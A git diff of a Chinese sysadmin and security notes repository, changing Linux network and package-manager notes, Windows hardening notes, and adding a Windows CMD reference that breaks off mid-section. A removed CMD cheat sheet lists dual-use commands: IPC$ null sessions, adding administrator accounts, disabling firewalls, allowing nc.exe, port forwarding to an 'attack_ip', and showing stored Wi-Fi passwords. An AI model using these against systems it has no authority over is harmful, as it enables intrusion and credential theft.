+arp -e # 以 Linux 的显示风格显示 arp 缓冲区中的条目
```
---
## 配置
-**Ubuntu**
+**修改主机名**
```bash
-vim /etc/network/interfaces
+vim /etc/hosts
-auto enp7s0 # 使用的网络接口
-iface enp7s0 inet static # 静态 ip 设置
-address 10.0.208.222
-netmask 255.255.240.0
-gateway 10.0.208.1
-dns-nameservers 10.0.208.1
-```
-```bash
-iface enp7s0 inet dhcp # dhcp 配置
+127.0.0.1 test localhost # 修改 localhost.localdomain 为 test,shutdown -r now 重启使修改生效
```
+或
```bash
-ip addr flush enp7s0
-systemctl restart networking.service
-
-systemctl restart NetworkManager
-systemctl enable NetworkManager
+hostnamectl set-hostname test # 修改 hostname 立即生效且重启也生效
```
-- **修改 DNS**
+**修改 DNS**
- 方法一
+- 通用(一次性,重启失效)
```vim
- vim /etc/network/interfaces
+ vim /etc/resolv.conf
- dns-nameservers 8.8.8.8
+ nameserver 8.8.8.8
```
- 重启后DNS就生效了,这时候再看/etc/resolv.conf,最下面就多了一行
- 方法二
+- 通用(长期)
```vim
- vim /etc/resolv.conf
+ apt install resolvconf
+
+ vim /etc/resolvconf/resolv.conf.d/head
nameserver 8.8.8.8
```
- ```bash
- chattr +i /etc/resolv.conf # 限制用户(包括 root)删除、修改、增加、链接等操作.要修改的话要先删掉这个设置 chattr -i /etc/resolv.conf
- service network restart
+ ```
+ resolvconf -u
```
-**Centos**
-```bash
-vim /etc/sysconfig/network-scripts/ifcfg-eth0 # 配置文件名称和网卡对应,可使用 ip a 查看所有网卡名称
-
-HOSTNAME=test
-onboot=yes # 激活网络
-HWADDR=00:0C:29:F1:2E:7B
-BOOTPROTO=static # 使用静态 IP,而不是由 DHCP 分配 IP
-# BOOTPROTO=dhcp 这个是 DHCP 的配置,如果配这个那下面的就不需要配置了
-IPADDR=172.16.102.61
-PREFIX=24
-GATEWAY=172.16.102.254
-DNS1=223.5.5.5
-```
-```vim
-vim /etc/hosts
+**修改IP**
+ - Ubuntu
+ ```bash
+ vim /etc/network/interfaces
-127.0.0.1 test localhost # 修改 localhost.localdomain 为 test,shutdown -r now 重启使修改生效
-```
-```bash
-service network restart
-systemctl restart NetworkManager # 重启网络管理
-systemctl enable NetworkManager
-```
+ auto enp7s0 # 使用的网络接口
+ iface enp7s0 inet static # 静态 ip 设置
+ address 10.0.208.222
+ netmask 255.255.240.0
+ gateway 10.0.208.1
+ ```
+ ```bash
+ ip addr flush enp7s0
+ systemctl restart networking.service
-- **修改 DNS**
- ```vim
- vim /etc/resolv.conf
+ systemctl restart NetworkManager
+ systemctl enable NetworkManager
+ ```
- nameserver 8.8.8.8
+- Centos
+ ```bash
+ vim /etc/sysconfig/network-scripts/ifcfg-eth0 # 配置文件名称和网卡对应,可使用 ip a 查看所有网卡名称
+
+ HOSTNAME=test
+ onboot=yes # 激活网络
+ HWADDR=00:0C:29:F1:2E:7B
+ BOOTPROTO=static # 使用静态 IP,而不是由 DHCP 分配 IP
+ # BOOTPROTO=dhcp 这个是 DHCP 的配置,如果配这个那下面的就不需要配置了
+ IPADDR=172.16.102.61
+ PREFIX=24
+ GATEWAY=172.16.102.254
+ DNS1=223.5.5.5
```
```bash
- chattr +i /etc/resolv.conf # 限制用户(包括 root)删除、修改、增加、链接等操作.要修改的话要先删掉这个设置 chattr -i /etc/resolv.conf
service network restart
+ systemctl restart NetworkManager # 重启网络管理
+ systemctl enable NetworkManager
```
-- **修改主机名**
+- Arch
```bash
- hostnamectl set-hostname test # 修改 hostname 立即生效且重启也生效
+ ifconfig -a # 查看下可用的网卡
+ ifconfig eth0 up # 启动网卡
+ dhcpcd eth0 # 获取 ip
```
+ ```vim
+ vim /etc/rc.conf
-**Arch**
-```bash
-ifconfig eth0 up # 启动网卡
-dhcpcd eth0 # 获取 ip
-```
-`ifconfig -a` 查看下可用的网卡
-```vim
-vim /etc/rc.conf
+ interface=eth0
+ eth0="dhcp"
+ lo="lo 127.0.0.1"
+ eth0="eth0 192.168.0.2 netmask 255.255.255.0 broadcast 192.168.0.255"
-interface=eth0
-eth0="dhcp"
-lo="lo 127.0.0.1"
-eth0="eth0 192.168.0.2 netmask 255.255.255.0 broadcast 192.168.0.255"
+ INTERFACES=(eth0)
+ gateway="default gw 192.168.0.1"
+ ROUTES=(gateway)
+ ```
+ ```bash
+ /etc/rc.d/network restart
+ ```
-INTERFACES=(eth0)
-gateway="default gw 192.168.0.1"
-ROUTES=(gateway)
-```
-`/etc/rc.d/network restart`
+**配置DHCP**
+- Ubuntu
+ ```bash
+ iface enp7s0 inet dhcp # dhcp 配置
+ ```
**ethtool**
@@ -742,7 +742,7 @@ ethtool -i eth0 # 查询该网卡的驱动相关信息
ethtool -d eth0 # 查询 eth0 网口注册性信息
ethtool -S eth0 # 查询网口收发包统计
ethtool -s eth0 speed 100 autoneg off # -s 选项可以修改网卡配置
-# 以上命令将eth0网卡的自协商传输模式关闭,传输速率改为100Mb/s。命令执行后需要重新启动eth0网卡:
+# 以上命令将 eth0 网卡的自协商传输模式关闭,传输速率改为 100Mb/s。命令执行后需要重新启动 eth0 网卡:
ifup eth0
# 通过以上命令修改网卡配置,在机器重启后配置将不再生效
@@ -754,8 +754,10 @@ ifup eth0
**tcpdump**
```bash
-# 安装
+# Debian安装
apt install tcpdump -y
+
+# Redhat安装
yum install tcpdump -y
# 当我们在没用任何选项的情况下运行 tcpdump 命令时,它将捕获所有接口上的数据包
@@ -930,6 +932,13 @@ ls -alh /var/cache/yum/
> apt 的全称是 Advanced Packaging Tool 是 Linux 系统下的一款安装包管理工具.
+**安装软件**
+```bash
+apt install
+apt-get install
+```
+
+**更新**
```bash
# 更新源:
apt-get update
@@ -938,13 +947,28 @@ apt-get update
apt-get update & apt-get upgrade
apt-get dist-upgrade
apt-get clean
+```
-# 无法获得锁 /var/lib/apt/lists/lock - open (11: 资源暂时不可用)
+**无法获得锁 /var/lib/apt/lists/lock - open (11: 资源暂时不可用)**
+```
rm -rf /var/cache/apt/archives/lock
rm -rf /var/lib/dpkg/lock-frontend
rm -rf /var/lib/dpkg/lock # 强制解锁占用
```
+**禁用 Ubuntu 自动更新**
+```bash
+nano /etc/apt/apt.conf.d/20auto-upgrades
+
+# 如果你不希望系统自动检查更新
+ APT::Periodic::Update-Package-Lists "0";
+ APT::Periodic::Unattended-Upgrade "0";
+
+# 果你希望它检查更新但不自动安装无人值守的升级
+ APT::Periodic::Update-Package-Lists "1";
+ APT::Periodic::Unattended-Upgrade "0";
+```
+
**Ubuntu apt 换源**
```vim
vim /etc/apt/sources.list
@@ -1022,7 +1046,7 @@ apt install gdebi
yum install make
yum install gcc
yum install gcc-c++
-./configure --prefix=/opt # 配置,表示安装到/opt目录
+./configure --prefix=/opt # 配置,表示安装到 /opt 目录
make # 编译
make install # 安装
```
@@ -1031,6 +1055,7 @@ make install # 安装
> DNF(Dandified Yum)是一种的 RPM 软件包管理器。
+**安装 dnf**
```bash
yum install epel-release
yum install dnf
@@ -1040,9 +1065,8 @@ yum install dnf
> dpkg 命令是 Debian Linux 系统用来安装、创建和管理软件包的实用工具.
+**基本用法**
```bash
-# deb 是 debian linux的安装格式,跟 red hat 的 rpm 非常相似,最基本的安装命令是:dpkg -i file.deb
-
dpkg -i xxxxx.deb # 安装软件
dpkg -R /usr/local/src # 安装路径下所有包
dpkg -L # 查看软件安装位置
@@ -1052,14 +1076,11 @@ dpkg -L # 查看软件安装位置
> pacman 是 Arch 的包管理工具.
+**基本用法**
```bash
pacman -S # 安装或者升级单个软件包
pacman -R # 删除单个软件包,保留其全部已经安装的依赖关系
pacman -Ss # 查询软件包
-
-# 常用软件
-pacman -S vim
-pacman -S fish
```
**Pacman 换源**
@@ -1086,7 +1107,7 @@ rpm -V # 验证
> Snappy 是一个软件部署和软件包管理系统,最早由 Canonical 公司为了 Ubuntu 移动电话操作系统而设计和构建。其包称为“snap”,工具名为“snapd”,可在多种 Linux 发行版上运行,完成发行上游主导的软件部署。该系统的设计面向手机、云、物联网和台式机。
-**Centos**
+**Centos下安装snap**
```bash
sudo yum install epel-release
sudo yum install snapd
@@ -1094,7 +1115,7 @@ sudo systemctl enable --now snapd.socket
sudo ln -s /var/lib/snapd/snap /snap
```
-**kali**
+**kali下安装snap**
```bash
sudo apt-get update
sudo apt install snapd
@@ -1102,7 +1123,7 @@ systemctl start snapd
export PATH=$PATH:/snap/bin
```
-**Ubuntu**
+**Ubuntu下安装snap**
```bash
sudo apt-get update
sudo apt install snapd
@@ -1122,7 +1143,7 @@ yum provides ifconfig # 查看哪个包提供 ifconfig
rm -f /var/run/yum.pid # 强制解锁占用
```
-**本地 yum 源**
+**配置本地 yum 源**
挂载到/mnt/cdrom
```bash
@@ -1149,7 +1170,7 @@ enabled=1 # 开启本地源
yum list # 看一下包
```
-**Alibaba yum 源**
+**配置 Alibaba yum 源**
直接下载源
```bash
@@ -1237,6 +1258,17 @@ end
---
# 系统管理
+
+## 系统信息
+
+- 内容参见 [信息](./笔记/信息.md)
+
+### 日志
+
+- 内容参见 [日志](./笔记/日志.md)
+
+---
+
## 系统设置
### 时间
@@ -1255,7 +1287,7 @@ hwclock # 硬件时钟访问工具
cal # 查看日历
```
-**tips**
+**Tips**
- **ntpd 与 ntpdate 的区别**
- ntpd 在实际同步时间时是一点点的校准过来时间的,最终把时间慢慢的校正对.而 ntpdate 不会考虑其他程序是否会阵痛,直接调整时间.
- 一个是校准时间,一个是调整时间.
@@ -1263,7 +1295,12 @@ cal # 查看日历
### 语言
-`echo $LANG` 查看当前操作系统的语言
+**查看系统语言**
+```bash
+echo $LANG # 查看当前操作系统的语言
+```
+
+**修改系统语言**
```bash
vim /etc/locale.conf
@@ -1274,7 +1311,22 @@ set LANG en_US.UTF-8 # 更改默认语言
source /etc/locale.conf
```
+**换界面显示语言**
+```bash
+dpkg-reconfigure locales
+# 空格是选择,Tab是切换,*是选中
+# 选中 en_US.UTF-8 和 zh_CN.UTF-8,确定后,将 en_US.UTF-8 选为默认,然后安装中文字体
+```
+
+**如果界面出现乱码,安装中文字体**
+```bash
+apt install xfonts-intl-chinese
+apt install ttf-wqy-microhei
+reboot
+```
+
### 启动项-计划任务
+
**查看**
```bash
chkconfig # 查看开机启动服务命令
@@ -1365,12 +1417,6 @@ getenforce # 查看 selinux 状态
---
-## 系统信息
-
-- 内容参见 [信息](./笔记/信息.md)
-
----
-
## 账号管控
**账号**
@@ -1465,6 +1511,8 @@ setfacl -b # 删除 ACL
关于 linux 的账号和认证更多内容参考笔记 [认证](./笔记/认证.md)
+---
+
## 进程管理
**服务管理**
@@ -1531,7 +1579,7 @@ kill -s STOP # 删除执行中的程序或工作
kill -9 && kill -KILL # 信号(SIGKILL)无条件终止进程
killall # 使用进程的名称来杀死进程
-ctrl+z # 将前台运行的任务暂停,仅仅是暂停,而不是将任务终止.
+ctrl+z # 将前台运行的任务暂停,仅仅是暂停,而不是将任务终止.
bg # 转后台运行
fg # 转前台运行
```
@@ -1655,7 +1703,8 @@ df # 报告驱动器的空间使用情况
df -ah # 查看磁盘占用大的文件夹
du # 报告目录的空间使用情况
- du -h /etc/yum | sort # 以人类可读的格式进行显示,排序显示
+ du -h . | sort # 以人类可读的格式进行显示,排序显示
+ du -hd 1 / | sort -hr
du -sh /etc/yum # 特定目录的总使用量
du --max-depth=1 -h # 查看文件夹下各个文件夹的磁盘占用
```
diff --git "a/1earn/\350\277\220\347\273\264/Linux/\347\254\224\350\256\260/\344\277\241\346\201\257.md" "b/1earn/\350\277\220\347\273\264/Linux/\347\254\224\350\256\260/\344\277\241\346\201\257.md"
index 8bbb15e1..ca768346 100644
--- "a/1earn/\350\277\220\347\273\264/Linux/\347\254\224\350\256\260/\344\277\241\346\201\257.md"
+++ "b/1earn/\350\277\220\347\273\264/Linux/\347\254\224\350\256\260/\344\277\241\346\201\257.md"
@@ -56,6 +56,8 @@ cat ~/.bashrc
cat ~/.bash_logout
env
set
+export # 查看所有环境变量
+env
```
---
@@ -130,6 +132,7 @@ ls -alh /var/log/samba/
## 应用服务
+**进程信息**
```bash
ps -aux # 列出所有进程以及相关信息命令
ps -ef
@@ -422,14 +425,6 @@ cat /etc/ssh/ssh_host_key
## 硬盘文件系统
-```bash
-df -h # 查看硬盘分区以及占用情况
-du -sh # 查看指定路径文件或目录大小
-fdisk -l # 查看硬盘大小,数量,类型
-
-mount
-```
-
**What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID**
```bash
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
diff --git "a/1earn/\350\277\220\347\273\264/Windows/CMD\345\221\275\344\273\244.md" "b/1earn/\350\277\220\347\273\264/Windows/CMD\345\221\275\344\273\244.md"
deleted file mode 100644
index 13fcb2a7..00000000
--- "a/1earn/\350\277\220\347\273\264/Windows/CMD\345\221\275\344\273\244.md"
+++ /dev/null
@@ -1,407 +0,0 @@
-# CMD 命令
-
----
-
-**永久修改 CMD 的默认字符集**
-
-regedit
-
-[HKEY_CURRENT_USER\Console] "CodePage"=dword:0000fde9
-
----
-
-# 网络常用
-
-**ipconfig**
-```cmd
-ipconfig /all 显示完整配置信息
-ipconfig /release 释放指定适配器的 IPv4 地址
-ipconfig /release6 释放指定适配器的 IPv6 地址
-ipconfig /renew 更新指定适配器的 IPv4 地址
-ipconfig /renew6 更新指定适配器的 IPv6 地址
-ipconfig /flushdns 清除 DNS 解析程序缓存
-```
-
-**netstat**
-```cmd
-netstat -a 查看开启了哪些端口,常用 netstat -an
-netstat -n 查看端口的网络连接情况,常用 netstat -an
-netstat -v 查看正在进行的工作
-netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况
-netstat -s 查看正在使用的所有协议使用情况
-netstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名
-
-netstat -bn 查看每个程序的连接
-```
-
-**ping**
-```cmd
-ping ip(或域名) 向对方主机发送默认大小为32字节的数据
-ping -l 数据包大小 ip
-ping -n 发送数据次数 ip
-ping -t ip 一直 ping.
-ping -t -l 65500 ip 发送大于64K的文件并一直 ping
-```
-
-**tracert**
-```cmd
--d 不将地址解析成主机名.
--h maximum_hops 搜索目标的最大跃点数.
--j host-list 与主机列表一起的松散源路由(仅适用于 IPv4).
--w timeout 等待每个回复的超时时间(以毫秒为单位).
--R 跟踪往返行程路径(仅适用于 IPv6).
--S srcaddr 要使用的源地址(仅适用于 IPv6).
--4 强制使用 IPv4.
--6 强制使用 IPv6.
-```
-
-**route**
-```cmd
-route print
-route print 192.*
-route add 0.0.0.0 mask 0.0.0.0 192.168.6.1 增加网关
-route delete 0.0.0.0 mask 0.0.0.0 192.168.6.1 删除网关
-route change 16.21.0.0 mask 255.255.0.0 16.28.0.25 将 16.21.0.0 段的网关改为 0.25
-```
-
-**arp**
-```cmd
-arp -a 查看全部
-arp -d ip 删除
-```
-
-**nslookup**
-```cmd
-nslookup domain [dns-server] 查询域名A记录
-nslookup -qt=type domain [dns-server] 查询其他记录
- A 地址记录
- AAAA 地址记录
- AFSDB Andrew文件系统数据库服务器记录
- ATMA ATM地址记录
- CNAME 别名记录
- HINFO 硬件配置记录,包括 CPU、操作系统信息
- ISDN 域名对应的 ISDN 号码
- MB 存放指定邮箱的服务器
- MG 邮件组记录
- MINFO 邮件组和邮箱的信息记录
- MR 改名的邮箱记录
- MX 邮件服务器记录
- NS 名字服务器记录
- PTR 反向记录
- RP 负责人记录
- RT 路由穿透记录
- SRV TCP服务器信息记录
- TXT 域名对应的文本信息
- X25 域名对应的X.25地址记录
-```
-
-**net**
-```cmd
-net use \\IP\ipc$ " " /user:" " 建立 IPC 空链接
-net use \\IP\ipc$ "密码" /user:"用户名" 建立 IPC 非空链接
-net use z: \\ip\ipc$ "pass" /user:"user" 直接登陆后映射对方 C: 到本地为 H:
-net use h: ipc$ 登陆后映射对方 C: 到本地为 H:
-net use \\IP\ipc$ /del 删除 IPC 链接
-net use h: /del 删除映射对方到本地的为 H: 的映射
-net user 用户名 密码 /add 建立用户
-net user guest /active:yes 激活 guest 用户
-net user 查看有哪些用户
-net user 帐户名 查看帐户的属性
-net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限
-net start 查看开启了哪些服务
-net start 服务名 开启服务;(如:net start telnet, net start schedule)
-net stop 服务名 停止某服务
-net time 目标ip 查看对方时间
-net time 目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数 /yes 可取消确认
-net view 查看本地局域网内开启了哪些共享
-net view ip 查看对方局域网内开启了哪些共享
-net config 显示系统网络设置
-net logoff 断开连接的共享
-net pause 服务名 暂停某服务
-net send ip "文本信息" 向对方发信息
-net ver 局域网内正在使用的网络连接类型和信息
-net share 查看本地开启的共享
-net share ipc$ 开启 ipc$ 共享
-net share ipc$ /del 删除 ipc$ 共享
-net share c$ /del 删除 C: 共享
-net user guest 12345 用 guest 用户登陆后用将密码改为 12345
-net password 密码 更改系统登陆密码
-```
-
-**netsh**
-
-查看防火墙状态
-```
-netsh firewall show state
-netsh advfirewall show allprofiles
-```
-
-开启防火墙
-```
-netsh firewall set opmode enable
-netsh firewall set allprofiles state on
-```
-
-关闭防火墙
-```
-netsh firewall set opmode disable
-netsh advfirewall set allprofiles state off
-```
-
-设置防火墙日志路径
-```
-netsh advfirewall set currentprofile logging filename "C:\Windows\firewall.log"
-```
-
-添加防火墙规则
-```
-netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389
-```
-
-删除防火墙规则
-```
-netsh advfirewall firewall delete rule name="rule_name"
-```
-
-添加端口规则
-```
-netsh firewall portopening tcp 1234 rule_name
-```
-
-删除端口规则
-```
-netsh firewall delete portopening tcp 1234
-```
-
-添加程序规则
-```
-netsh firewall add allowedprogram "C:\\nc.exe" "allow nc" enable
-```
-
-删除程序规则
-```
-netsh firewall delete allowedprogram "C:\\nc.exe"
-```
-
-添加端口转发
-```
-netsh interface portproxy add v4tov4 [listenaddress=victim_ip] listenport=victim_port connectaddress=attack_ip connectport=attack_port
-```
-
-删除端口转发
-```
-netsh interface portproxy delete v4tov4 [listenaddress=victim_ip] listenport=victim_port
-```
-
-查看端口转发
-```
-netsh interface portproxy show all
-netsh interface portproxy show v4tov4
-netsh interface portproxy show v4tov6
-netsh interface portproxy show v6tov4
-netsh interface portproxy show v6tov6
-```
-
-安装 IPv6
-```
-netsh interface ipv6 install
-```
-
-查看无线网络信息
-```
-netsh wlan show profiles
-```
-
-查看指定 WIFI 密码
-```
-netsh wlan show profiles wifi_name key=clear
-```
-
----
-
-# 系统信息
-
-`ver` windows 版本
-
-`msinfo32` 系统信息面板
-
-`services.msc` 服务面板
-
-`gpedit.msc` 组策略管理器
-
-`regedit` 注册表
-
-`finger username @host` 查看最近有哪些用户登陆
-
-`sc showsid server` 查看 SID
-
-**slmgr.vbs**
-```cmd
-slmgr.vbs -dlv 显示详细的许可证信息
-slmgr.vbs -dli 显示许可证信息
-slmgr.vbs -xpr 当前许可证截止日期
-slmgr.vbs -dti 显示安装ID 以进行脱机激
-slmgr.vbs -ipk (Product Key) 安装产品密钥
-slmgr.vbs -ato 激活Windows
-slmgr.vbs -cpky 从注册表中清除产品密钥(防止泄露引起的攻击)
-slmgr.vbs -ilc (License file)安装许可证
-slmgr.vbs -upk 卸载产品密钥
-slmgr.vbs -skms (name[ort] )批量授权
-```
-
----
-
-# 域
-
-**dsquery**
-
-dsquery 属于 windows 域服务器自带的命令,用于查询域相关的信息
-
-查询所有域主机名
-```
-dsquery computer
-```
-
-查询指定域主机名
-```
-dsquery computer -name win* -desc desktop -limit 0
-```
-
-查询n周未活动的域主机名
-```
-dsquery computer -inactive n -limit 0
-```
-
-查询n天内未更改密码的域主机名
-```
-dsquery computer -stalepwd n
-```
-
-查询指定域的域主机名
-```
-dsquery computer -s ip -u username -p password -limit 0
-```
-
-查询所有域用户名
-```
-dsquery user
-```
-
-修改指定域用户的密码
-```
-dsquery user -samid username | dsmod user -pwd new_password
-```
-
-查询域联系人
-```
-dsquery contact
-```
-
-查询域中所有的组
-```
-dsquery group
-```
-
-查询域中所有的组织单元
-```
-dsquery ou
-```
-
-查询域中所有的站点
-```
-dsquery site
-```
-
-查询域控制器
-```
-dsquery server
-```
-
-查询域中的配额规范
-```
-dsquery quota
-```
-
-查询域中的分区对象
-```
-dsquery partition
-```
-
----
-
-# 常用
-
-**shutdown**
-```cmd
-shutdown -s -t 60 60秒后关机
-shutdown -s -t 3600 1小时后关机
-tsshutdn 60秒后关机
-shutdown -s -f 强制关机
-shutdown -s -t 时间
-shutdown -a 取消 关机命令
-```
-
-**tasklist**
-
-显示所有进程及其服务
-```cmd
-tasklist /svc
-```
-
-显示指定进程信息
-```cmd
-tasklist /fi "pid eq 1234" /svc
-tasklist /fi "status eq running" /svc
-tasklist /fi "status eq running" /fi "username eq nt authority\system" /svc
-```
-
-显示使用给定 exe/dll 名称的所有进程
-```cmd
-tasklist /m xxx.dll
-```
-
-显示远程主机的进程信息
-```cmd
-tasklist /s ip /u username /p password /svc
-```
-
-**taskkill**
-
-终止指定的进程及其子进程(根据进程名称)
-```cmd
-taskkill /f /im notepad.exe /t
-```
-
-终止指定进程及其子进程(根据进程 ID)
-```cmd
-taskkill /f /pid 1234 /t
-taskkill /f /fi "pid eq 1234" /t
-```
-
-终止远程主机的指定进程
-```cmd
-taskkill /s ip /u username /p password /pid 1234 /t
-taskkill /s ip /u username /p password /fi "pid eq 1234" /t
-```
-
-**at**
-```cmd
-at id号 开启已注册的某个计划任务
-at /delete 停止所有计划任务,用参数 /yes 则不需要确认就直接停止
-at id号 /delete 停止某个已注册的计划任务
-at 查看所有的计划任务
-at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
-```
-
-**[Schtasks.exe](https://docs.microsoft.com/en-us/windows/win32/taskschd/schtasks)**
-
-创建计划任务 "gametime",在每月的第一个星期天运行"空当接龙".
-```markdown
-SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN gametime /TR c:\windows\system32\freecell
-
-- /SC schedule 指定计划频率.有效计划任务: MINUTE、 HOURLY、DAILY、WEEKLY、MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT.
-- /MO modifier 改进计划类型以允许更好地控制计划重复周期.有效值列于下面"修改者"部分中.
-- /D days 指定该周内运行任务的日期.有效值:MON、TUE、WED、THU、FRI、SAT、SUN和对 MONTHLY 计划的 1 - 31(某月中的日期).通配符"*"指定所有日期.
-- /TN taskname 以路径\名称形式指定对此计划任务进行唯一标识的字符串.
-- /TR taskrun 指定在这个计划时间运行的程序的路径和文件名.例如: C:\windows\system32\calc.exe
-```
diff --git "a/1earn/\350\277\220\347\273\264/Windows/Powershell/PowerShell\347\254\224\350\256\260.md" "b/1earn/\350\277\220\347\273\264/Windows/Powershell/PowerShell\347\254\224\350\256\260.md"
index 762c5761..fc2a4030 100644
--- "a/1earn/\350\277\220\347\273\264/Windows/Powershell/PowerShell\347\254\224\350\256\260.md"
+++ "b/1earn/\350\277\220\347\273\264/Windows/Powershell/PowerShell\347\254\224\350\256\260.md"
@@ -17,12 +17,14 @@ Windows PowerShell 需要用于管理 .NET 对象的语言.该语言需要为使
**常见报错**
- **无法加载文件 `******.ps1`,因为在此系统中禁止执行脚本.有关详细信息,请参阅 "get-help about_signing"**
-
- `set-ExecutionPolicy RemoteSigned`
+ ```powershell
+ set-ExecutionPolicy RemoteSigned
+ ```
- **使用 powershell 运行脚本报错:进行数字签名.无法在当前系统上运行该脚本.有关运行脚本和设置执行策略的详细信息**
-
- `powershell "Set-ExecutionPolicy -ExecutionPolicy Unrestricted -force |Out-null"`
+ ```powershell
+ powershell "Set-ExecutionPolicy -ExecutionPolicy Unrestricted -force |Out-null"
+ ```
---
diff --git "a/1earn/\350\277\220\347\273\264/Windows/Secure-Win.md" "b/1earn/\350\277\220\347\273\264/Windows/Secure-Win.md"
index 8d483e7a..a9e443f6 100644
--- "a/1earn/\350\277\220\347\273\264/Windows/Secure-Win.md"
+++ "b/1earn/\350\277\220\347\273\264/Windows/Secure-Win.md"
@@ -1,7 +1,7 @@
# Secure-Win
-
+
- `windows 加固+维护+应急响应参考`
@@ -10,26 +10,23 @@
# 大纲
-**[文件](#文件)**
+* **[文件](#文件)**
+ * [可疑文件](#可疑文件)
-* [可疑文件](#可疑文件)
+* **[系统](#系统)**
+ * [开机启动](#开机启动)
+ * [账号](#账号)
+ * [进程](#进程)
+ * [注册表](#注册表)
+ * [日志](#日志)
+ * [系统日志](#系统日志)
+ * [日志工具](#日志工具)
+ * [第三方程序日志](#第三方程序日志)
-**[系统](#系统)**
-
-* [开机启动](#开机启动)
-* [账号](#账号)
-* [进程](#进程)
-* [注册表](#注册表)
-* [日志](#日志)
- * [系统日志](#系统日志)
- * [日志工具](#日志工具)
- * [第三方程序日志](#第三方程序日志)
-
-**[Net](#Net)**
-
-* [端口](#端口)
-* [RDP](#rdp)
-* [DNS](#dns)
+* **[Net](#Net)**
+ * [端口](#端口)
+ * [RDP](#rdp)
+ * [DNS](#dns)
---
@@ -120,7 +117,12 @@ REG query HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
**查看服务器是否存在隐藏账号、克隆账号**
-使用D盾工具,集成了对克隆账号检测的功能。
+可以使用 D 盾工具,其集成了对克隆账号检测的功能。
+
+**加固**
+
+- Microsoft本地管理员密码解决方案(LAPS)
+ - 参考文章:[Microsoft Local Administrator Password Solution (LAPS)](https://adsecurity.org/?p=1790)
## 进程
@@ -130,7 +132,7 @@ REG query HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
开始-运行,输入 `services.msc`
-**cmd 下使用**
+**cmd 下查看可疑进程**
```
tasklist /svc | findstr pid
netstat -ano
@@ -143,7 +145,7 @@ wmic process get CreationDate,name,processid,commandline,ExecutablePath /value
wmic process get name,processid,executablepath| findstr "7766"
```
-**powershell 下使用**
+**powershell 下查看可疑进程**
```
Get-WmiObject -Class Win32_Process
Get-WmiObject -Query "select * from win32_service where name='WinRM'" -ComputerName Server01, Server02 | Format-List -Property PSComputerName, Name, ExitCode, Name, ProcessID, StartMode, State, Status
@@ -156,6 +158,12 @@ Get-WmiObject -Query "select * from win32_service where name='WinRM'" -ComputerN
- 进程的路径是否合法
- CPU 或内存资源占用长时间过高的进程
+**令牌假冒防御**
+
+禁止 Domain Admins 登录对外且未做安全加固的服务器,因为一旦服务器被入侵,域管理员的令牌可能会被攻击者假冒,从控制 DC。
+
+如果想清除假冒令牌,重启服务器即可。
+
## 注册表
开始-运行,输入 `regedit`
diff --git "a/1earn/\350\277\220\347\273\264/Windows/Speed-Win.md" "b/1earn/\350\277\220\347\273\264/Windows/Speed-Win.md"
new file mode 100644
index 00000000..c3b85064
--- /dev/null
+++ "b/1earn/\350\277\220\347\273\264/Windows/Speed-Win.md"
@@ -0,0 +1,963 @@
+# Speed-Win
+
+---
+
+# 大纲
+
+* **[基础使用](#基础使用)**
+ * [环境变量](#环境变量)
+ * [符号](#符号)
+ * [会话](#会话)
+ * [文件和目录](#文件和目录)
+ * [查看](#查看)
+ * [创建](#创建)
+ * [删除](#删除)
+ * [查询](#查询)
+ * [修改](#修改)
+ * [链接](#链接)
+
+* **[网络管理](#网络管理)**
+ * [查看网络信息](#查看网络信息)
+ * [网络排错工具](#网络排错工具)
+ * [防火墙](#防火墙)
+
+* **[系统管理](#系统管理)**
+ * [系统信息](#系统信息)
+ * [日志](#日志)
+ * [系统设置](#系统设置)
+ * [时间](#时间)
+ * [注册表](#注册表)
+ * [计划任务](#计划任务)
+ * [组策略](#组策略)
+ * [账号管控](#账号管控)
+ * [进程管理](#进程管理)
+ * [设备管理](#设备管理)
+ * [硬盘-数据](#硬盘-数据)
+
+* **[域](#域)**
+
+---
+
+# 基础使用
+
+```cmd
+echo "Hello World" 输出 Hello World 到终端屏幕
+cls 清除屏幕
+```
+
+**shutdown**
+```cmd
+shutdown 关闭、重启、注销、休眠计算机
+ shutdown -s -t 60 60秒后关机
+ shutdown -s -t 3600 1小时后关机
+ tsshutdn 60秒后关机
+ shutdown -s -f 强制关机
+ shutdown -s -t 时间
+ shutdown -a 取消 关机命令
+```
+
+**运行脚本**
+```cmd
+cscript 执行 vbs 脚本
+ cscript /Nologo test.vbs 执行 test.vbs 脚本
+
+call ff.bat 调用执行 ff.bat 脚本(ff.bat 脚本执行完原脚本才会往下执行)
+
+start 运行某程序或命令
+ start /max notepad.exe 最大化的方式启动记事本
+ start /min calc.exe 最小化的方式启动计算器
+ start /min "" d:\Proxifier.exe 最小化的方式启动 Proxifier 代理工具
+ start tasklist 启动一个 cmd 实例窗口,并运行 tasklist
+ start explorer f:\ 调用资源管理器打开f盘
+ strat iexplore "www.qq.com" 启动 ie 并打开 www.qq.com 网址
+ start ff.bat 启动开始执行 ff.bat(启动 ff.bat 脚本后,原脚本继续执行,不会等 ff.bat 脚本执行完)
+```
+
+## 环境变量
+
+```cmd
+set 显示当前用户所有的环境变量
+
+ set path 查看 path 的环境变量值(准确的说是查看以 path 开头的环境变量)
+ set path= 清空 path 变量
+
+ set path=d:\execute
+ 将 path 变量设置为 d:\execute(注:修改的 path 只会影响当前回话,也不会存储到系统配置中去;当前 cmd 窗口关闭,新设置的 path 也就不存在了)
+
+ set path=%path%;d:\execute
+ 在 path 变量中添加 d:\execute(注:修改的 path 只会影响当前回话,也不会存储到系统配置中去;当前 cmd 窗口关闭,新设置的 path 也就不存在了)
+
+path 显示当前 path 变量的值
+
+ path ; 清除所有搜索路径设置并指示 cmd.exe 只在当前目录中搜索
+ path d:\xxx;%PATH% 将 d:\xxx 路径添加到 path 中
+```
+
+---
+
+## 符号
+
+**&**
+```cmd
+顺序执行多条命令,而不管命令是否执行成功
